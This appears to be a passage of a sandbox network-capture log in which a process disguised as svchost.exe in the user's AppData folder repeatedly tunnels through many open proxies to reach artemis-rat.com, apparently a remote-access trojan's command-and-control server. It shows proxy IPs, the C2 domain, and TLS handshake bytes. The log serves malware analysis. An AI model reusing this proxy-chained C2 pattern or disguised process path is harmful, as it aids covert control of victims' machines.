Mar 9, 2024 13:14:30.790594101 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2525	192.168.2.5	58276	84.39.112.144	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.640494108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2526	192.168.2.5	58280	8.218.231.62	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.642266035 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2527	192.168.2.5	58368	104.129.205.94	54321	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.642838955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2528	192.168.2.5	58292	212.231.230.141	18500	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.644578934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2529	192.168.2.5	58090	103.49.202.250	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.645672083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2530	192.168.2.5	58264	201.71.3.60	999	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.646100998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.333594084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.146373034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.833703041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.146514893 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2531	192.168.2.5	58304	165.227.104.122	58839	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.647082090 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.270592928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.068094969 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.535595894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.374314070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2532	192.168.2.5	58363	54.152.3.36	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.652931929 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.873529911 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:30 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:30.874207020 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a5 b3 e0 d3 99 6c 23 bd 5d 5e 78 20 9e 2e 17 0c 32 a2 f8 7e 5a 39 40 5b b7 35 fb 96 73 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eRl#]^x .2~Z9@[5s*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:31.090843916 CET	536	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 4b cd b4 50 d1 0d 21 f9 da 50 62 b0 7f ee 8b b7 f4 d6 af 4c 83 c6 f3 d4 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9KP!PbLDOWNGRD0000H010Uartemis-rat.com0240309120649Z260309120649Z010Uartemis-rat.com0"0H0)K].S*kC
Mar 9, 2024 13:14:31.090859890 CET	536	IN	Data Raw: dc 87 a6 79 77 13 1b 72 1b 36 4c c0 5f 8d 99 ab 97 15 34 b2 fb 3d d9 eb de f8 f6 4f 8c e7 65 00 24 f8 e7 69 ff a2 cf 68 c7 c6 e8 f6 d3 90 a6 61 e1 b5 f8 d8 0d b3 9d 08 50 9a a5 6c 80 b3 79 5b 15 3f 26 42 dd 4f 6d f8 63 6e c7 ee 4d e7 01 5a b0 3b Data Ascii: ywr6L_4=Oe$ihaPly[?&BOmcnMZ;oeB9yY:kPHwNOCGJ{B;,q@w 'v?\fUFL"XF+[-gzHw[&&^eK~+#(P>x,(
Mar 9, 2024 13:14:31.090924978 CET	7	IN	Data Raw: 03 00 04 0e 00 00 00 Data Ascii:
Mar 9, 2024 13:14:31.108571053 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 3e b9 a0 c4 71 91 a6 4a ab 84 4c a5 a4 0e 5b 6b 44 62 22 6f aa 91 74 8f 44 17 f1 b3 7b fa 13 1c 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 3d 10 4c cd 8f e0 24 85 d5 b0 76 80 ad 93 bb 15 f1 93 2a 25 c7 Data Ascii: %! >qJL[kDb"otD{(=L$v*%?`_3
Mar 9, 2024 13:14:31.330064058 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 6b a7 72 d3 66 62 20 53 1a a2 cc 2d 60 05 32 e4 94 a3 c0 b9 e1 55 7d 2c ac 16 a6 ec 97 45 87 7e 5a 01 cd 8e 81 0d 85 1f Data Ascii: (krfb S-`2U},E~Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2533	192.168.2.5	58267	185.104.112.62	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.656750917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.998620033 CET	799	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:30 GMT Server: Apache/2.4.56 (Debian) Content-Length: 607 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 71 73 68 6e 40 6d 61 69 6c 2e 72 75 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at qshn@mail.ru to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2534	192.168.2.5	57851	112.51.96.118	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.662134886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.067823887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.788106918 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:14:44 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2535	192.168.2.5	58279	8.219.228.100	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.665339947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2536	192.168.2.5	57199	20.0.91.150	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.677257061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.787339926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2537	192.168.2.5	57718	142.54.231.38	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.680185080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2538	192.168.2.5	58450	172.67.53.215	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.689073086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.843465090 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2539	192.168.2.5	57179	138.36.150.15	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.696887970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.442672014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2540	192.168.2.5	58282	212.108.155.205	9090	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.707240105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2541	192.168.2.5	58457	184.169.154.119	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.712131977 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.885567904 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:30 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:30.886626959 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a5 35 b8 66 25 ca e7 a8 42 bc d3 15 c5 de 41 62 42 17 25 55 9b 26 30 e1 65 6a 7d ca 60 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eR5f%BAbB%U&0ej}`*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:31.061592102 CET	1079	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 f5 fd 91 a3 f5 c9 fd d5 d1 b0 cc ae 58 bd e5 d5 5f 7a 5c fd 28 41 7b 0b 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9X_z\(A{DOWNGRD0000H010Uartemis-rat.com0240309115509Z260309115509Z010Uartemis-rat.com0"0H0";dJJH
Mar 9, 2024 13:14:31.065104008 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 20 d3 10 9d cd 7d be 45 ea 00 43 06 1e d6 4c db 5f df df 14 86 cc 27 32 f7 43 29 ad 17 1b d6 43 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 b2 d2 f3 20 44 3e 11 35 a9 77 ff bc db 7f 89 b4 22 d6 bd 06 c4 Data Ascii: %! }ECL_'2C)C( D>5w"TeEk42%B
Mar 9, 2024 13:14:31.237322092 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 3a 6e 24 12 8b 36 a0 e0 f3 74 d1 ee a3 7c 62 15 10 45 29 34 3d 94 1b e3 b3 91 c8 3f 05 7b 75 69 d8 bf 87 fa 92 29 10 14 Data Ascii: (:n$6t\|bE)4=?{ui)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2542	192.168.2.5	58445	162.214.227.68	55392	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.715302944 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.270543098 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880785942 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.965059996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.126688957 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.366343975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2543	192.168.2.5	57613	199.229.254.129	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.718941927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2544	192.168.2.5	58308	202.83.102.83	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.729783058 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2545	192.168.2.5	58526	202.159.35.153	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.730612993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2546	192.168.2.5	58434	129.213.150.205	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.732239962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2547	192.168.2.5	58323	43.131.242.162	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.733254910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2548	192.168.2.5	58528	202.159.35.153	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
